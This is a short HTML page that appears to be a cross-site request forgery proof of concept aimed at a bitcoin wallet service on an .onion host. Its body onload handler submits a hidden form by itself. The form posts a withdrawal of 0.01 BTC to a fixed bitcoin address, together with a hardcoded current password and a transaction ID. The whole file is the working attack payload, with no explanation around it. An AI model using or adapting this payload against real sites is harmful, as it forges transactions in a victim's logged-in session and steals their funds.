<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://ltxocqh4nvwkofil.onion/wallet">
            <input type="hidden" name="btcAmount" value="0.01" />
            <input type="hidden" name="btcAddress" value="1J2KpvoXUit2n6bisUWByUCYrhhdwUkDgQ" />
            <input type="hidden" name="currentPassword" value="Password1" />
            <input type="hidden" name="transactionID" value="1497476116.1408344251" />
            <input type="hidden" name="btcWithdraw" value="Withdraw" />
        </form>
    </body>
</html>